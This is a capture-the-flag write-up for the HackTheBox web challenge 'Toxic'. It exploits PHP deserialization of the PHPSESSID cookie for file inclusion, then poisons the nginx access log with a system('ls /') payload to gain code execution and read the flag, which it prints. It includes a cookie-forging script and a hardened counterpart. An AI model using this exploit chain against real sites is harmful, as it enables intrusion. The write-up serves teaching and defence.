Luca Puzzoni

aka k0d14k.

Toxic (web)

by k0d14k

Toxic is a web page written in PHP that shows information about frogs.

The file to be rendered is set in the PHPSESSID cookie, which is the base64 encoding of a serialized PageModel object.

The flag is used only in the entrypoint.sh file, as follows:

We need to tamper with the PHPSESSID cookie to force the server to read the flag file instead of index.html.

To access another file by tampering with the cookie, we can use the following script:

<?php
// Same class as the one used by the application: the destructor includes
// whatever path is stored in $file.
class PageModel{
    public $file;
    public function __destruct(){
        include($this->file);
    }
}
$page = new PageModel;
$page->file = '[file name]';   // path of the file we want the server to include
// Serialize and base64-encode the object, exactly as the cookie expects it.
echo "\n\nCOOKIE: ".base64_encode(serialize($page))."\n\n";
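
For contrast, here is an added example (not the challenge's code) of how the same cookie handling looks in its vulnerable form next to a hardened one; the ALLOWED_PAGES list, the pages/ directory and the helper names are assumptions for illustration.

```php
<?php
// Added example, not code from the challenge: unsafe cookie handling as the
// write-up describes it, next to a hardened version.

class PageModel {
    public $file;
    public function __destruct() {
        include($this->file);   // includes whatever path the cookie supplied
    }
}

// Unsafe: unserialize() on attacker-controlled data instantiates PageModel,
// and its destructor includes any readable file (the flag, or a poisoned log).
function loadPageUnsafe(string $cookie) {
    return unserialize(base64_decode($cookie));
}

// Hardened: no object instantiation from the cookie, and only files from a
// fixed allowlist (hypothetical names) may be rendered.
const ALLOWED_PAGES = ['index.html' => true, 'frogs.html' => true];

function loadPageSafe(string $cookie): string {
    $raw = base64_decode($cookie, true);
    if ($raw === false) {
        return 'index.html';
    }
    // allowed_classes=false turns any serialized object into
    // __PHP_Incomplete_Class, so no __destruct/__wakeup can fire.
    // Storing the page name as JSON instead of a PHP object would be better still.
    $data = unserialize($raw, ['allowed_classes' => false]);
    $file = is_array($data) ? ($data['file'] ?? '') : '';
    $file = basename((string)$file);           // drops any directory component
    return isset(ALLOWED_PAGES[$file]) ? $file : 'index.html';
}

// Usage: include only an allowlisted file, resolved under a fixed directory.
$page = loadPageSafe($_COOKIE['PHPSESSID'] ?? '');
include __DIR__ . '/pages/' . $page;
```

A serialized PageModel sent to the hardened version becomes an incomplete-class object rather than an array, so the lookup falls back to index.html and neither the flag file nor the nginx log can be included.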

The first problem is that we don't know the flag file's name.

What do we know about the application so far? We know that it is a PHP application running on an nginx server.

We know how to turn this into RCE if we can include /var/log/nginx/access.log, so let's check whether this file is accessible.

Very well, now we can try to inject our payload:

<?php system('ls /');?>

And finally we have the file name, flag_yFs8d, so now we can simply access the flag.


Flag: HTB{P0i5on_1n_Cyb3r_W4rF4R3?!}